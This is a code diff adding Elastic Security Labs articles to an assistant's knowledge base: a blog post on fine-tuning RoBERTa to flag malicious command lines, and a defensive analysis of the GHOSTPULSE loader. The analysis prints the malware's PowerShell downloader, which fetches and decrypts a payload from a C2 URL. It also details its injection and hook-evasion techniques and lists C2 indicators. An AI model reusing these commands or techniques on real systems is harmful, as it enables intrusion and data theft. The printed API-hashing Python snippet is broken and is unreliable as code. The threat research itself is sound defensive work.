+| 6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99 | SHA-256   | Windows.Trojan.Guloader | GULOADER downloader      |
+| 101.99.75[.]183/MfoGYZkxZIl205.bin                        | url       | NA                      | GULOADER C2 URL          |
+| 101.99.75[.]183                                                  | ipv4-addr | NA                      | GULOADER C2 IP           |
+
+## References
+
+* [https://github.com/elastic/labs-releases/tree/main/tools/guloader](https://github.com/elastic/labs-releases/tree/main/tools/guloader) 
+* [https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye](https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye)
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/getting_the_most_out_of_transforms_in_elastic.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/getting_the_most_out_of_transforms_in_elastic.md
new file mode 100644
index 0000000000000..4c6d2c2b43753
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/getting_the_most_out_of_transforms_in_elastic.md
@@ -0,0 +1,133 @@
+---
+title: "Getting the Most Out of Transformers in Elastic"
+slug: "getting-the-most-out-of-transforms-in-elastic"
+date: "2022-08-23"
+description: "In this blog, we will briefly talk about how we fine-tuned a transformer model meant for a masked language modeling (MLM) task, to make it suitable for a classification task."
+author:
+  - slug: apoorva-joshi
+  - slug: thomas-veasey
+  - slug: benjamin-trent
+image: "machine-learning-1200x628px-2021-notext.jpg"
+category:
+  - slug: security-research
+tags:
+  - machine learning
+---
+
+## Preamble
+
+In 8.3, our Elastic Stack Machine Learning team introduced a way to import [third party Natural Language Processing (NLP) models](https://www.elastic.co/guide/en/machine-learning/master/ml-nlp-model-ref.html) into Elastic. As security researchers, we HAD to try it out on a security dataset. So we decided to build a model to identify malicious command lines by fine-tuning a pre-existing model available on the [Hugging Face model hub](https://huggingface.co/models).
+
+Upon finding that the fine-tuned model was performing (surprisingly!) well, we wanted to see if it could replace or be combined with our previous [tree-based model](https://www.elastic.co/blog/problemchild-detecting-living-off-the-land-attacks) for detecting Living off the Land (LotL) attacks. But first, we had to make sure that the throughput and latency of this new model were reasonable enough for real-time inference. This resulted in a series of experiments, the results of which we will detail in this blog.
+
+In this blog, we will briefly talk about how we fine-tuned a transformer model meant for a masked language modeling (MLM) task, to make it suitable for a classification task. We will also look at how to import custom models into Elastic. Finally, we’ll dive into all the experiments we did around using the fine-tuned model for real-time inference.
+
+## NLP for command line classification
+
+Before you start building NLP models, it is important to understand whether an [NLP](https://www.ibm.com/cloud/learn/natural-language-processing) model is even suitable for the task at hand. In our case, we wanted to classify command lines as being malicious or benign. Command lines are a set of commands provided by a user via the computer terminal. An example command line is as follows:
+
+```
+**move test.txt C:\**
+```
+
+The above command moves the file **test.txt** to the root of the \*\*C:\*\* directory.
+
+Arguments in command lines are related in the way that the co-occurrence of certain values can be indicative of malicious activity. NLP models are worth exploring here since these models are designed to understand and interpret relationships in natural (human) language, and since command lines often use some natural language.
+
+## Fine-tuning a Hugging Face model
+
+Hugging Face is a data science platform that provides tools for machine learning (ML) enthusiasts to build, train, and deploy ML models using open source code and technologies. Its model hub has a wealth of models, trained for a variety of NLP tasks. You can either use these pre-trained models as-is to make predictions on your data, or fine-tune the models on datasets specific to your [NLP](https://www.ibm.com/cloud/learn/natural-language-processing) tasks.
+
+The first step in fine-tuning is to instantiate a model with the model configuration and pre-trained weights of a specific model. Random weights are assigned to any task-specific layers that might not be present in the base model. Once initialized, the model can be trained to learn the weights of the task-specific layers, thus fine-tuning it for your task. Hugging Face has a method called [from_pretrained](https://huggingface.co/docs/transformers/v4.21.1/en/main_classes/model#transformers.PreTrainedModel.from_pretrained) that allows you to instantiate a model from a pre-trained model configuration.
+
+For our command line classification model, we created a [RoBERTa](https://huggingface.co/docs/transformers/model_doc/roberta) model instance with encoder weights copied from the [roberta-base](https://huggingface.co/roberta-base) model, and a randomly initialized sequence classification head on top of the encoder:
+
+**model = RobertaForSequenceClassification.from_pretrained('roberta-base', num_labels=2)**
+
+Hugging Face comes equipped with a [Tokenizers](https://huggingface.co/docs/transformers/v4.21.0/en/main_classes/tokenizer) library consisting of some of today's most used tokenizers. For our model, we used the [RobertaTokenizer](https://huggingface.co/docs/transformers/model_doc/roberta#transformers.RobertaTokenizer) which uses [Byte Pair Encoding](https://en.wikipedia.org/wiki/Byte_pair_encoding) (BPE) to create tokens. This tokenization scheme is well-suited for data belonging to a different domain (command lines) from that of the tokenization corpus (English text). A code snippet of how we tokenized our dataset using **RobertaTokenizer** can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-tokenize-py). We then used Hugging Face's [Trainer](https://huggingface.co/docs/transformers/v4.21.0/en/main_classes/trainer#transformers.Trainer) API to train the model, a code snippet of which can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-train-py).
+
+ML models do not understand raw text. Before using text data as inputs to a model, it needs to be converted into numbers. Tokenizers group large pieces of text into smaller semantically useful units, such as (but not limited to) words, characters, or subwords — called token —, which can, in turn, be converted into numbers using different encoding techniques.
+
+> - Check out [this](https://youtu.be/_BZearw7f0w) video (2:57 onwards) to review additional pre-processing steps that might be needed after tokenization based on your dataset.
+> - A complete tutorial on how to fine-tune pre-trained Hugging Face models can be found [here](https://huggingface.co/docs/transformers/training).
+
+## Importing custom models into Elastic
+
+Once you have a trained model that you are happy with, it's time to import it into Elastic. This is done using [Eland](https://www.elastic.co/guide/en/elasticsearch/client/eland/current/machine-learning.html), a Python client and toolkit for machine learning in Elasticsearch. A code snippet of how we imported our model into Elastic using Eland can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-import-py).  
+You can verify that the model has been imported successfully by navigating to **Model Management \\> Trained Models** via the Machine Learning UI in Kibana:
+
+![Imported model in the Trained Models UI](/assets/images/getting-the-most-out-of-transforms-in-elastic/Imported_model_in_the_Trained_Models_UI.png)
+
+## Using the Transformer model for inference — a series of experiments
+
+We ran a series of experiments to evaluate whether or not our Transformer model could be used for real-time inference. For the experiments, we used a dataset consisting of ~66k command lines.
+
+Our first inference run with our fine-tuned **RoBERTa** model took ~4 hours on the test dataset. At the outset, this is much slower than the tree-based model that we were trying to beat at ~3 minutes for the entire dataset. It was clear that we needed to improve the throughput and latency of the PyTorch model to make it suitable for real-time inference, so we performed several experiments:
+
+### Using multiple nodes and threads
+
+The latency numbers above were observed when the models were running on a single thread on a single node. If you have multiple Machine Learning (ML) nodes associated with your Elastic deployment, you can run inference on multiple nodes, and also on multiple threads on each node. This can significantly improve the throughput and latency of your models.
+
+You can change these parameters while starting the trained model deployment via the [API](https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html):
+
+```
+**POST \_ml/trained\_models/\\<model\_id\\>/deployment/\_start?number\_of\_allocations=2&threa ds\_per\_allocation=4**
+```
+
+**number_of_allocations** allows you to set the total number of allocations of a model across machine learning nodes and can be used to tune model throughput. **threads_per_allocation** allows you to set the number of threads used by each model allocation during inference and can be used to tune model latency. Refer to the [API documentation](https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html) for best practices around setting these parameters.
+
+In our case, we set the **number_of_allocations** to **2** , as our cluster had two ML nodes and **threads_per_allocation** to **4** , as each node had four allocated processors.
+
+Running inference using these settings **resulted in a 2.7x speedup** on the original inference time.
+
+### Dynamic quantization
+
+Quantizing is one of the most effective ways of improving model compute cost, while also reducing model size. The idea here is to use a reduced precision integer representation for the weights and/or activations. While there are a number of ways to trade off model accuracy for increased throughput during model development, [dynamic quantization](https://pytorch.org/tutorials/intermediate/dynamic_quantization_bert_tutorial.html) helps achieve a similar trade-off after the fact, thus saving on time and resources spent on iterating over the model training.
+
+Eland provides a way to dynamically quantize your model before importing it into Elastic. To do this, simply pass in quantize=True as an argument while creating the TransformerModel object (refer to the code snippet for importing models) as follows:
+
+```
+**# Load the custom model**
+**tm = TransformerModel("model", "text\_classification", quantize=True)**
+```
+
+In the case of our command line classification model, we observed the model size drop from 499 MB to 242 MB upon dynamic quantization. Running inference on our test dataset using this model **resulted in a 1.6x speedup** on the original inference time, for a slight drop in model [**sensitivity**](https://en.wikipedia.org/wiki/Sensitivity_and_specificity) (exact numbers in the following section) **.**
+
+### Knowledge Distillation
+
+[Knowledge Distillation](https://towardsdatascience.com/knowledge-distillation-simplified-dd4973dbc764) is a way to achieve model compression by transferring knowledge from a large (teacher) model to a smaller (student) one while maintaining validity. At a high level, this is done by using the outputs from the teacher model at every layer, to backpropagate error through the student model. This way, the student model learns to replicate the behavior of the teacher model. Model compression is achieved by reducing the number of parameters, which is directly related to the latency of the model.
+
+To study the effect of knowledge distillation on the performance of our model, we fine-tuned a [distilroberta-base](https://huggingface.co/distilroberta-base) model (following the same procedure described in the fine-tuning section) for our command line classification task and imported it into Elastic. **distilroberta-base** has 82 million parameters, compared to its teacher model, **roberta-base** , which has 125 million parameters. The model size of the fine-tuned **DistilRoBERTa** model turned out to be **329** MB, down from **499** MB for the **RoBERTa** model.
+
+Upon running inference with this model, we **observed a 1.5x speedup** on the original inference time and slightly better model sensitivity (exact numbers in the following section) than the fine-tuned roberta-base model.
+
+### Dynamic quantization and knowledge distillation
+
+We observed that dynamic quantization and model distillation both resulted in significant speedups on the original inference time. So, our final experiment involved running inference with a quantized version of the fine-tuned **DistilRoBERTa** model.
+
+We found that this **resulted in a 2.6x speedup** on the original inference time, and slightly better model sensitivity (exact numbers in the following section). We also observed the model size drop from **329** MB to **199** MB after quantization.
+
+## Bringing it all together
+
+Based on our experiments, dynamic quantization and model distillation resulted in significant inference speedups. Combining these improvements with distributed and parallel computing, we were further able to **reduce the total inference time on our test set from four hours to 35 minutes**. However, even our fastest transformer model was still several magnitudes slower than the tree-based model, despite using significantly more CPU resources.
+
+The Machine Learning team here at Elastic is introducing an inference caching mechanism in version 8.4 of the Elastic Stack, to save time spent on performing inference on repeat samples. These are a common occurrence in real-world environments, especially when it comes to Security. With this optimization in place, we are optimistic that we will be able to use transformer models alongside tree-based models in the future.
+
+A comparison of the sensitivity (true positive rate) and specificity (true negative rate) of our tree-based and transformer models shows that an ensemble of the two could potentially result in a more performant model:
+
+|                         |                 |                         |                 |                         |
+| ----------------------- | --------------- | ----------------------- | --------------- | ----------------------- |
+| Model                   | Sensitivity (%) | False Negative Rate (%) | Specificity (%) | False Positive Rate (%) |
+| Tree-based              | 99.53           | 0.47                    | 99.99           | 0.01                    |
+| RoBERTa                 | 99.57           | 0.43                    | 97.76           | 2.24                    |
+| RoBERTa quantized       | 99.56           | 0.44                    | 97.64           | 2.36                    |
+| DistilRoBERTa           | 99.68           | 0.32                    | 98.66           | 1.34                    |
+| DistilRoBERTa quantized | 99.69           | 0.31                    | 98.71           | 1.29                    |
+
+As seen above, the tree-based model is better suited for classifying benign data while the transformer model does better on malicious samples, so a weighted average or voting ensemble could work well to reduce the total error by averaging the predictions from both the models.
+
+## What's next
+
+We plan to cover our findings from inference caching and model ensembling in a follow-up blog. Stay tuned!
+
+In the meanwhile, we’d love to hear about models you're building for inference in Elastic. If you'd like to share what you're doing or run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack)and [discussion forums](https://discuss.elastic.co/c/security). Happy experimenting!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks.md
new file mode 100644
index 0000000000000..a96832f5de73c
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks.md
@@ -0,0 +1,360 @@
+---
+title: "GHOSTPULSE haunts victims using defense evasion bag o' tricks"
+slug: "ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks"
+date: "2023-10-27"
+description: "Elastic Security Labs reveals details of a new campaign leveraging defense evasion capabilities to infect victims with malicious MSIX executables."
+author:
+  - slug: salim-bitam
+  - slug: joe-desimone
+image: "photo-edited-05@2x.jpg"
+category:
+  - slug: attack-pattern
+  - slug: malware-analysis
+---
+
+## Preamble
+
+Elastic Security Labs has observed a campaign to compromise users with signed [MSIX](https://learn.microsoft.com/en-us/windows/msix/overview) application packages to gain initial access. The campaign leverages a stealthy loader we call GHOSTPULSE which decrypts and injects its final payload to evade detection.
+
+MSIX is a Windows app package format that developers can leverage to package, distribute, and install their applications to Windows users. With [App Installer](https://learn.microsoft.com/en-us/windows/msix/app-installer/app-installer-root), MSIX packages can be installed with a double click. This makes them a potential target for adversaries looking to compromise unsuspecting victims. However, MSIX requires access to purchased or stolen code signing certificates making them viable to groups of above-average resources.
+
+In a common attack scenario, we suspect the users are directed to download malicious MSIX packages through [compromised websites](https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates), search-engine optimization (SEO) techniques, or malvertising. The masquerading themes we’ve observed include installers for Chrome, Brave, Edge, Grammarly, and WebEx to highlight a few.
+
+![](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image5.png)
+
+From the user's perspective, the “Install” button appears to function as intended. No pop-ups or warnings are presented. However, a PowerShell script is covertly used to download, decrypt, and execute GHOSTPULSE on the system. 
+
+![](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image10.jpg)
+
+## Malware Analysis
+
+The GHOSTPULSE loader can be broken down into 3 stages (sometimes preceded by a PowerShell script) used to execute a final payload.
+
+### Stage 0
+
+We consider the PowerShell script dropped by the malicious MSIX installer to be the stage 0 payload. The PowerShell script is typically included in MSIX infection vectors, but not always in other GHOSTPULSE infection methods (MSI, EXE, ISO). In one sample, the PowerShell script downloads a GPG-encrypted file from `manojsinghnegi[.]com/2.tar.gpg`. 
+
+Next, the PowerShell script decrypts the file using the command-line GPG utility using the following parameters:
+
+- `putin` - the passphrase for the GPG file
+- `--batch` - execute GPG in non-interactive mode
+- `--yes` - answer “yes” to any prompts
+- `--passphrase-fd 0` - read the passphrase from a file descriptor, 0 instructs GPG to use STDIN, which is putin
+- `--decrypt` - decrypt a file
+- `--output` - what to save the decrypted file as
+
+```
+# 1
+$url = "https://manojsinghnegi[.]com/2.tar.gpg"
+$outputPath = "$env:APPDATA\$xxx.gpg"
+Invoke-WebRequest -Uri $url -OutFile $outputPath
+
+# 1
+echo 'putin' | .$env:APPDATA\gpg.exe --batch --yes --passphrase-fd 0 --decrypt --output $env:APPDATA\$xxx.rar $env:APPDATA\$xxx.gpg
+```
+
+The GPG utility is included in the malicious MSIX installer package.
+
+The decrypted file is a tar archive containing an executable `VBoxSVC.exe` which is in reality a renamed signed `gup.exe` executable that is used to update Notepad++, which is vulnerable to sideloading, an encrypted file in one example `handoff.wav` and a mostly benign library `libcurl.dll` with one of its functions overwritten with malicious code. The PowerShell executes the binary `VBoxSVC.exe` that will side load from the current directory the malicious DLL `libcurl.dll`. By minimizing the on-disk footprint of encrypted malicious code, the threat actor is able to evade file-based AV and ML scanning.
+
+![File metadata of VBoxSVC.bin](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image11.png)
+
+### Stage 1
+
+The first stage of GHOSTPULSE is embedded within a malicious DLL that undergoes side-loading through a benign executable. Execution of the corresponding code is triggered during the *DllEntryPoint* phase. 
+
+The process is initiated by pinpointing the base address of the malicious DLL of `libcurl.dll`, achieved through parsing the *InLoadOrderModuleList* API. This list, residing in the Process Environment Block (PEB), systematically records information about loaded modules.
+
+![Parsing the InLoadOrderModuleList structure](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image13.png)
+
+Next, GHOSTPULSE builds an Import Address Table (IAT) incorporating essential APIs. This operation involves parsing the *InLoadOrderModuleList* structure within the Process Environment Block (PEB).
+
+![Stage 1 hashing algorithm](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image13.png)
+
+```
+# Python code used for API hashing
+def calculate_api_name_hash(api_name):
+    value = 0
+    for char in input_string:
+        total = (ord(char) + value *0x1003F)&0xFFFFFFFF
+    return value 
+```
+        
+Below is the Stage 1 IAT structure reconstructed from the GHOSTPULSE malware sample, provided for reference:
+
+```
+struct core_stage1_IAT
+{
+void *kernel32_LoadLibraryW;
+void *kernel32_QueryPerformanceCounter;
+void *ntdll_module;
+void *kernel32_CloseHandle;
+__int64 field_20;
+__int64 field_28;
+__int64 field_30;
+__int64 field_38;
+void *kernel32_GetTempPathW;
+void *kernel32_GetModuleFileNameW;
+__int64 field_50;
+__int64 field_58;
+__int64 field_60;
+void *ntdll__swprintf;
+__int64 field_70;
+__int64 field_78;
+__int64 (__fastcall *ntdll_RtlDecompressBuffer)(__int64, __int64, _QWORD, __int64, int, int *);
+void *kernel32_CreateFileW;
+void *kernel32_ReadFile;
+void *ntdll_NtQueryInformationProcess;
+void *kernel32_GetFileSize;
+__int64 field_A8;
+void *kernel32_module;
+__int64 field_B8;
+void *ntdll_NtDelayExecution;
+__int64 (__fastcall *kernel32_GlobalAlloc)(__int64, __int64);
+__int64 field_D0;
+void *kernel32_GlobalFree;
+__int64 field_E0;
+void *ntdll_RtlQueryEnvironmentVariable_U;
+};
+```
+
+It then proceeds with its operation by reading and parsing the file named `handoff.wav` from the current directory. This file contains an encrypted data blob divided into distinct chunks. Each chunk of data is positioned following the string IDAT. The parsing process involves the malware executing through two distinct steps.
+
+![Reading and decrypting the encrypted file](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image14.png)
+
+The initial phase involves identifying the commencement of the encrypted data by searching for the IDAT string in the file, which is followed by a distinctive 4-byte tag value. If the tag corresponds to the value stored in the malware's configuration, the malware extracts the bytes of the encrypted blob. The initial structure is as follows:
+
+```
+struct initial_idat_chunk
+{
+  DWORD size_of_chunk;
+  DWORD IDAT_string;
+  DWORD tag;
+  DWORD xor_key;
+  DWORD size_of_encrypted_blob;
+  _BYTE first_chunk[];
+};
+```
+    
+- **size_of_chunk**: The malware utilizes this value, performing bits shifting to determine the chunk size to extract before the next occurrence of IDAT. 
+- **xor_key**: A 4-byte long XOR key employed for decrypting the consolidated encrypted blob after extraction
+- **size_of_encrypted_blob**: Denotes the overall size of the encrypted blob, which is stored in chunks within the file 
+- **first_chunk**: Marks the start of the first chunk of data in memory
+ 
+![](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image2.png)
+
+In the second step, the malware locates the next occurrence of IDAT and proceeds to extract the encrypted chunks that follow it which has the following format: 
+
+```
+struct next_idat_chunk
+{
+DWORD size_of_chunk;
+DWORD IDAT_string;
+_BYTE n_chunk[];
+};
+```
+
+- **size_of_chunk**: The malware utilizes this value, performing bits shifting to determine the chunk size to extract before the next occurrence of IDAT. 
+- **n_chunk**: Marks the start of the chunk of data in memory
+
+The malware continues extracting encrypted data chunks until it reaches the specified size_of_encrypted_blob. Subsequently, the malware proceeds to decrypt the data using the 4-byte XOR key *xor_key*.
+
+At this stage, the data blob, which is already compressed, undergoes decompression by the malware. The decompression process utilizes the `RtlDecompressBuffer` api.
+
+![Decompression using the RtlDecompressBuffer API](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image1.png)
+ 
+The malware proceeds by loading a specified library stored in its configuration, in this case, `mshtml.dll`, utilizing the *LoadLibraryW* function. Shellcode (Stage 2) contained inside the decrypted and decompressed blob of data is written to the .text section of the freshly loaded DLL and then executed.
+
+This technique is known as “module stomping”. The following image shows the associated *VirtualProtect* API calls captured with [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) associated with the module stomping:
+
+![](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image4.png)
+ 
+### Stage 2
+
+Stage 2 initiates by constructing a new IAT structure and utilizing the CRC32 algorithm as the API name hashing mechanism.
+The following is the IAT structure of stage 2:
+
+```
+struct core_stage2_IAT
+{
+  void *kernel32_module;
+  void *ntdll_module;
+  void *kernel32_CreateFileW;
+  void *kernel32_WriteFile;
+  void *kernel32_ReadFile;
+  void *kernel32_SetFilePointer;
+  void *kernel32_CloseHandle;
+  void *kernel32_GlobalAlloc;
+  void *kernel32_GlobalFree;
+  void *kernel32_ExpandEnvironmentStringsW;
+  void *kernel32_GetFileSize;
+  void *kernel32_GetProcAddress;
+  void *kernel32_LoadLibraryW;
+  void *ntdll__swprintf;
+  void *kernel32_QueryPerformanceCounter;
+  void *ntdll_RtlDecompressBuffer;
+  void *field_80;
+  void *field_88;
+  void *field_90;
+  void *field_98;
+  void *field_A0;
+  void *ntdll_NtDelayExecution;
+  void *ntdll_RtlRandom;
+  void *kernel32_GetModuleFileNameW;
+  void *kernel32_GetCommandLineW;
+  void *field_C8;
+  void *ntdll_sscanf;
+  void *field_D8;
+  void *ntdll_NtQueryInformationProcess;
+  void *ntdll_NtQuerySystemInformation;
+  void *kernel32_CreateDirectoryW;
+  void *kernel32_CopyFileW;
+  void *ntdll_NtClose;
+  void *field_108;
+  void *field_110;
+  void *field_118;
+  void *field_120;
+  void *field_128;
+  void *kernel32_SetCurrentDirectoryW;
+  void *field_138;
+  void *kernel32_SetEnvironmentVariableW;
+  void *kernel32_CreateProcessW;
+  void *kernel32_GetFileAttributesW;
+  void *msvcrt_malloc;
+  void *msvcrt_realloc;
+  void *msvcrt_free;
+  void *ntdll_RtlHashUnicodeString;
+  void *field_178;
+  void *field_180;
+  void *kernel32_OpenMutexA;
+  void *field_190;
+  void *kernel32_VirtualProtect;
+  void *kernel32_FlushInstructionCache;
+  void *field_1A8;
+  void *ntdll_NtOpenProcessToken;
+  void *ntdll_NtQueryInformationToken;
+  void *ntdll_RtlWalkFrameChain;
+  void *field_1C8;
+  void *addr_temp_file_content;
+  void *addr_decrypted_file;
+};
+```
+
+Concerning NT functions, the malware reads the ntdll.dll library from disk and writes it to a dynamically allocated memory space with read, write, and execute permissions. Subsequently, it parses the loaded `ntdll.dll` library to extract the offsets of the required NT functions. These offsets are then stored within the newly built IAT structure. When the malware necessitates the execution of an NT API, it adds the API offset to the base address of `ntdll.dll` and directly invokes the API. Given that NT APIs operate at a very low level, they execute syscalls directly, which does not require the `ntdll.dll` library to be loaded in memory using the LoadLibrary API, this is done to evade userland hooks set by security products.
+
+The following is the structure used by the malware to store NT API offsets:
+
+```
+struct __unaligned __declspec(align(4)) core_stage2_nt_offsets_table
+{
+  __int64 ntdll_module;
+  int ZwCreateSection;
+  int ZwMapViewOfSection;
+  int ZwWriteVirtualMemory;
+  int ZwProtectVirtualMemory;
+  int NtSuspendThread;
+  int ZwResumeThread;
+  int ZwOpenProcess;
+  int ZwGetContextThread;
+  int NtSetContextThread;
+};
+```
+
+GHOSTPULSE has the ability to establish persistence, if configured to, by generating an `.lnk` file that points to the Stage 1 binary, denoted as `VBoxSVC.exe`. To achieve this, the malware leverages COM (Component Object Model) objects as part of its technique.
+
+![Persistence executed according to the configuration flag](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image6.png)
+ 
+It extracts another sub-blob of data from the first decrypted blob of Stage 1. This data is located at a specific position in the structure. The malware then performs an XOR encryption on this sub-blob, using the result of the XOR operation between the CRC32 value of the machine's computer name and the constant value `0xA1B2D3B4`. Finally, the encrypted data is saved to a file in the user's temporary folder.
+It extracts another sub-blob of data from the first decrypted blob of Stage 1. This data is located at a specific position in the structure. The malware then performs an XOR encryption on this sub-blob, using the result of the XOR operation between the CRC32 value of the machine's computer name and the constant value `0xA1B2D3B4`. Finally, the encrypted data is saved to a file in the user's temporary folder.
+
+The malware then initiates a suspended child process using the executable specified in the Stage 2 configuration, which is a 32-bit `cmd.exe` in this case. It then adds an environment variable to the child process with a random name, example: `GFHZNIOWWLVYTESHRTGAVC`, pointing to the previously created temporary file. 
+
+Further, the malware proceeds by creating a section object and mapping a view of it to `mshtml.dll` in the child process using the `ZwCreateSection` and `ZwMapViewOfSection` APIs.
+
+The legitimate `mshtml.dll` code is overwritten with the *WriteProcessMemory* API. The primary thread’s execution is then redirected to the malicious code in `mshtml.dll` with the *Wow64SetThreadContext* API as shown in the following image:
+
+![](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image12.png)
+ 
+The parent process promptly terminates itself.
+
+### Stage 3
+
+The objective of GHOSTPULSE’s Stage 3 is to load and execute the final payload in another  process. One interesting part of Stage 3 was that it overwrites its previously executed instructions with new instructions to make analysis difficult. It is also capable of establishing persistence using the same method described above. GHOSTPULSE executes NTDLL APIs using the "[heaven’s gate](https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/)" technique.
+
+![](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image9.png)
+
+Stage 3 starts off by constructing its own Function Import Table using CRC32 as the hashing algorithm. Additionally, it has the capability to disable redirection of the file system to WOW64, achieved through the utilization of the procedure `Wow64FsRedirection`, if configured to do so.
+
+Following this, Stage 3 accesses the environment variable that was set earlier, in our case `GFHZNIOWWLVYTESHRTGAVC`, retrieves the associated temporary file and proceeds to decrypt its contents.
+
+![Decrypting the temp file using the computer name and a hardcoded value](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image15.png)
+
+The decrypted file includes both a configuration and the ultimate payload in an encrypted format. The final payload undergoes XOR decryption using a 200-byte long key stored within the configuration. The malware then parses the PE structure of the payload with a set of functions that will indicate how the payload will be injected, for example, the type of payload (DLL or executable) architecture, etc.
+
+![Decrypting the final payload](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image3.png)
+
+GHOSTPULSE employs [Process Doppelgänging](https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack), leveraging the NTFS transactions feature to inject the final payload into a new child process. The following steps illustrate the process:
+
+- Calls the `CreateTransaction` API to initial a transaction
+- Creates a transaction file with a random file name in temp folder with the `ZwCreateFile` API
+- Writes the payload to the temp file using the `ZwWriteFile` API
+- Creates a section of the transaction file with `ZwCreateSection` API
+- At this point the file is not needed anymore, the malware calls the `RollbackTransaction` API to roll the transaction back
+- GHOSTPULSE creates a suspended process with the target process path taken from it's configuration, in our sample `1msbuild.exe1`
+- It maps a view of the section to the process with the `ZwMapViewOfSection` API
+- It sets the child process thread instruction pointer to the entry point of the final payload with the `NtSetContextThread` API
+- Finally it resumes the thread with the `NtResumeThread` API
+
+![Functions used to execute process doppelgänging technique](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image8.png)
+
+### Final Payload
+
+The final payload varies from sample to sample but is typically an information stealer. We have observed SectopRAT, Rhadamanthys, Vidar, Lumma, and NetSupport as final payloads. In SectopRAT samples, the malware first reaches out to Pastebin to retrieve the command and control address. In this case, it was `195.201.198[.]179` over TCP port `15647` as shown below:
+
+![](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image7.jpg)
+
+## Configuration extractor
+
+Alongside this research, the Elastic Security Research Team has provided a [configuration extractor](https://github.com/elastic/labs-releases/blob/main/tools/ghostpulse/ghostpulse_payload_extractor.py) to allow threat researchers to continue work to discover further developments within this campaign and expand detection capabilities for our community. The extractor takes the encrypted file shipped with GHOSTPULSE as the input.
+
+![](/assets/images/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks/image16.png)
+
+## Detection Guidance
+
+Elastic Defend detects this threat with the following [behavior protection rules](https://github.com/elastic/protections-artifacts/tree/main/behavior):
+
+- DNS Query to Suspicious Top Level Domain
+- Library Load of a File Written by a Signed Binary Proxy
+- Suspicious API Call from an Unsigned DLL
+- Suspicious Memory Write to a Remote Process
+- Process Creation from Modified NTDLL
+
+The following yara rule will also detect GHOSTPULSE loaders on disk:
+
+- [Windows.Trojan.GhostPulse](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostPulse.yar)
+
+## Observations
+ 
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ghostpulse) in both ECS and STIX format.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type        | Name            | Reference                   |
+|------------------------------------------------------------------|-------------|-----------------|-----------------------------|
+| 78.24.180[.]93                                                   | ip-v4       |                 | Stage 0 C2 IP               |
+| manojsinghnegi[.]com                                             | domain-name |                 | Stage 0 C2 domain           |
+| manojsinghnegi[.]com/2.tar.gpg                                   | url         |                 | Stage 0 C2 URL              |
+| 0c01324555494c35c6bbd8babd09527bfc49a2599946f3540bb3380d7bec7a20 | sha256      | Chrome-x64.msix | Malicious MSIX              |
+| ee4c788dd4a173241b60d4830db128206dcfb68e79c68796627c6d6355c1d1b8 | sha256      | Brave-x64.msix  | Malicious MSIX              |
+| 4283563324c083f243cf9335662ecc9f1ae102d619302c79095240f969d9d356 | sha256      | Webex.msix      | Malicious MSIX              |
+| eb2addefd7538cbd6c8eb42b70cafe82ff2a8210e885537cd94d410937681c61 | sha256      | new1109.ps1     | PowerShell Downloader       |
+| 49e6a11453786ef9e396a9b84aeb8632f395477abc38f1862e44427982e8c7a9 | sha256      | 38190626900.rar | GHOSTPULSE tar archive      |
+| Futurity Designs Ltd                                             | Code signer |                 | Chrome-x64.msix code signer |
+| Fodere Titanium Limited                                          | Code signer |                 | Brave-x64.msix code signer  |
+| IMPERIOUS TECHNOLOGIES LIMITED                                   | Code signer |                 | Webex.msix code signer      |
+
+## References
+
+- [https://twitter.com/1ZRR4H/status/1699923793077055821](https://twitter.com/1ZRR4H/status/1699923793077055821)
